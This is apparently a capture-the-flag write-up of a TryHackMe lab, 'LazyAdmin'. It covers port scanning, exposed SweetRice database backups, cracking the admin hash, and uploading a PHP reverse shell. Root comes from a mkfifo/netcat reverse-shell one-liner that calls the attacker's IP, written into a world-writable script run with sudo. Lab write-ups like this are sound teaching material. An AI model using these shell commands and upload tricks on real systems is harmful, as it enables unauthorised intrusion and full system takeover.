LazyAdmin - wook413

![[Pasted image 20250628172534.png]] # Target information - IP: `10.10.7.107` # Information gathering - Port scanning TCP scan all ports ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 22:47 CDT Nmap scan report for 10.10.7.107 Host is up (0.13s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds ``` TCP scan with scripts against ports 22 and 80 ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sC -sV $IP -p22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 22:49 CDT Nmap scan report for 10.10.7.107 Host is up (0.14s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA) | 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA) |_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.18 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds ``` UDP scan revealed no open ports at least among top 1,000 ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 22:52 CDT Nmap scan report for 10.10.7.107 Host is up (0.13s latency). Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 1900/udp closed upnp 3659/udp closed apple-sasl 8000/udp closed irdmi 16974/udp closed unknown 21780/udp closed unknown 42508/udp closed candp Nmap done: 1 IP address (1 host up) scanned in 1.44 seconds ``` ---- # Footprinting ##### Port 80 Accessing 10.10.7.107 displays the default Apache2 Ubuntu landing page and I couldn't find any interesting info on here. ![[Pasted image 20250627230639.png]] I used `gobuster` to enumerate directories and found `/content`. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.7.107 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /content (Status: 301) [Size: 312] [--> http://10.10.7.107/content/] ``` This is what `/content` looks like and It appears to be using a CMS named `SweetRice`. ![[Pasted image 20250627232612.png]] Ran another gobuster scan against the found directory `/content` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://$IP/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.7.107/content [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 319] [--> http://10.10.7.107/content/images/] /js (Status: 301) [Size: 315] [--> http://10.10.7.107/content/js/] /inc (Status: 301) [Size: 316] [--> http://10.10.7.107/content/inc/] /as (Status: 301) [Size: 315] [--> http://10.10.7.107/content/as/] /_themes (Status: 301) [Size: 320] [--> http://10.10.7.107/content/_themes/] /attachment (Status: 301) [Size: 323] [--> http://10.10.7.107/content/attachment/] ``` # Exploit ##### SweetRice 1.5.1 I landed on `/as` and it's a SweetRice login page. We'll definitely need to find some creds to get in. ![[Pasted image 20250627233541.png]] I looked up SweetRice on searchsploit and there are some known vulnerabilities we can potentially exploit. ![[Pasted image 20250628154900.png]] In the path of `/content/inc/latest.txt` I found the following. This probably indicates the version of SweetRice which has several known vulnerabilities to it. ![[Pasted image 20250628155011.png]] SweetRice 1.5.1 - `40718.txt` says that we can access all mysql backup and download them from a directory. ![[Pasted image 20250628164131.png]] I downloaded this MySQL file from the directory. It contains some highly valuable information we were looking for, including the admin's username and a hashed password, which I suspect is an MD5 hash. ``` \\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"; ``` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Downloads] └─$ cat mysql_bakup_20191129023059-1.5.1.sql <?php return array ( 0 => 'DROP TABLE IF EXISTS `%--%_attachment`;', 1 => 'CREATE TABLE `%--%_attachment` ( `id` int(10) NOT NULL AUTO_INCREMENT, `post_id` int(10) NOT NULL, `file_name` varchar(255) NOT NULL, `date` int(10) NOT NULL, `downloads` int(10) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;', 2 => 'DROP TABLE IF EXISTS `%--%_category`;', 3 => 'CREATE TABLE `%--%_category` ( `id` int(4) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL, `link` varchar(128) NOT NULL, `title` text NOT NULL, `description` varchar(255) NOT NULL, `keyword` varchar(255) NOT NULL, `sort_word` text NOT NULL, `parent_id` int(10) NOT NULL DEFAULT \'0\', `template` varchar(60) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `link` (`link`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;', 4 => 'DROP TABLE IF EXISTS `%--%_comment`;', 5 => 'CREATE TABLE `%--%_comment` ( `id` int(10) NOT NULL AUTO_INCREMENT, `name` varchar(60) NOT NULL DEFAULT \'\', `email` varchar(255) NOT NULL DEFAULT \'\', `website` varchar(255) NOT NULL, `info` text NOT NULL, `post_id` int(10) NOT NULL DEFAULT \'0\', `post_name` varchar(255) NOT NULL, `post_cat` varchar(128) NOT NULL, `post_slug` varchar(128) NOT NULL, `date` int(10) NOT NULL DEFAULT \'0\', `ip` varchar(39) NOT NULL DEFAULT \'\', `reply_date` int(10) NOT NULL DEFAULT \'0\', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;', 6 => 'DROP TABLE IF EXISTS `%--%_item_data`;', 7 => 'CREATE TABLE `%--%_item_data` ( `id` int(10) NOT NULL AUTO_INCREMENT, `item_id` int(10) NOT NULL, `item_type` varchar(255) NOT NULL, `data_type` varchar(20) NOT NULL, `name` varchar(255) NOT NULL, `value` text NOT NULL, PRIMARY KEY (`id`), KEY `item_id` (`item_id`), KEY `item_type` (`item_type`), KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;', 8 => 'DROP TABLE IF EXISTS `%--%_item_plugin`;', 9 => 'CREATE TABLE `%--%_item_plugin` ( `id` int(10) NOT NULL AUTO_INCREMENT, `item_id` int(10) NOT NULL, `item_type` varchar(255) NOT NULL, `plugin` varchar(255) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;', 10 => 'DROP TABLE IF EXISTS `%--%_links`;', 11 => 'CREATE TABLE `%--%_links` ( `lid` int(10) NOT NULL AUTO_INCREMENT, `request` text NOT NULL, `url` text NOT NULL, `plugin` varchar(255) NOT NULL, PRIMARY KEY (`lid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;', 12 => 'DROP TABLE IF EXISTS `%--%_options`;', 13 => 'CREATE TABLE `%--%_options` ( `id` int(10) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL, `content` mediumtext NOT NULL, `date` int(10) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;', 14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');', 15 => 'INSERT INTO `%--%_options` VALUES(\'2\',\'categories\',\'\',\'1575023409\');', 16 => 'INSERT INTO `%--%_options` VALUES(\'3\',\'links\',\'\',\'1575023409\');', 17 => 'DROP TABLE IF EXISTS `%--%_posts`;', 18 => 'CREATE TABLE `%--%_posts` ( `id` int(10) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL, `title` varchar(255) NOT NULL, `body` longtext NOT NULL, `keyword` varchar(255) NOT NULL DEFAULT \'\', `tags` text NOT NULL, `description` varchar(255) NOT NULL DEFAULT \'\', `sys_name` varchar(128) NOT NULL, `date` int(10) NOT NULL DEFAULT \'0\', `category` int(10) NOT NULL DEFAULT \'0\', `in_blog` tinyint(1) NOT NULL, `views` int(10) NOT NULL, `allow_comment` tinyint(1) NOT NULL DEFAULT \'1\', `template` varchar(60) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `sys_name` (`sys_name`), KEY `date` (`date`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;', );?> ``` `crackstation.net`, a popular, free hash cracker, did crack the password and the type was in fact MD5. ![[Pasted image 20250628164506.png]] I successfully logged in with the credentials found. ![[Pasted image 20250628165244.png]] In the `Media Center` tab, there's a file upload feature which we can possibly take advantage of and upload php web shell. ![[Pasted image 20250628165955.png]] I downloaded the famous `Pentest Monkey` php web shell. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php --2025-06-28 16:57:46-- https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.110.133, 185.199.109.133, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 5491 (5.4K) [text/plain] Saving to: ‘php-reverse-shell.php’ php-reverse-shell.php 100%[===========================================>] 5.36K --.-KB/s in 0s 2025-06-28 16:57:51 (42.7 MB/s) - ‘php-reverse-shell.php’ saved [5491/5491] ``` Modify the reverse shell to adjust it to your settings. ![[Pasted image 20250628165853.png]] Then I uploaded the file. Notice the file extension has been changed to `.phtml`. I have changed the file extension because the web server appears to not accept `.php` files. ![[Pasted image 20250628170531.png]] Navigating to `/content/attachment`, I found the webshell we just uploaded! ![[Pasted image 20250628170710.png]] Got the shell. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.23.133.183] from (UNKNOWN) [10.10.236.234] 54282 Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux 01:07:27 up 1:37, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ ``` In the path of `/home/itguy`, I found the user flag ```bash www-data@THM-Chal:/home/itguy$ ls ls Desktop Downloads Pictures Templates backup.pl mysql_login.txt Documents Music Public Videos examples.desktop user.txt www-data@THM-Chal:/home/itguy$ cat user.txt cat user.txt THM{63e5... ``` # Privilege Escalation ##### sudo -l `sudo -l` reveals that we can run `/usr/bin/perl /home/itguy/backup.pl` command with sudo. I can run `sudo /usr/bin/perl` but `/home/itguy/backup.pl` has to come as the paramter. ```bash www-data@THM-Chal:/home/itguy$ sudo -l sudo -l Matching Defaults entries for www-data on THM-Chal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl ``` I wonder what's inside `/home/itguy/backup.pl`? it contains a very simple code which is just running `/etc/copy.sh` file. ```bash www-data@THM-Chal:/home/itguy$ cat /home/itguy/backup.pl cat /home/itguy/backup.pl #!/usr/bin/perl system("sh", "/etc/copy.sh"); ``` Then what's inside `/etc/copy.sh`? Interestingly, it contains what appears to be a reverse shell one-liner. Since we have the 'write' permission, let's adjust the IP address and ports to ours. ```bash www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh cat /etc/copy.sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh ls -l /etc/copy.sh -rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh ``` Modified the `copy.sh` file to match my IP address and port. ```bash www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.23.133.183 2222 >/tmp/f ``` Got the reverse shell as `root` :) ![[Pasted image 20250628172328.png]] `root.txt` ```bash # cd /root # ls root.txt # cat root.txt THM{6637... ```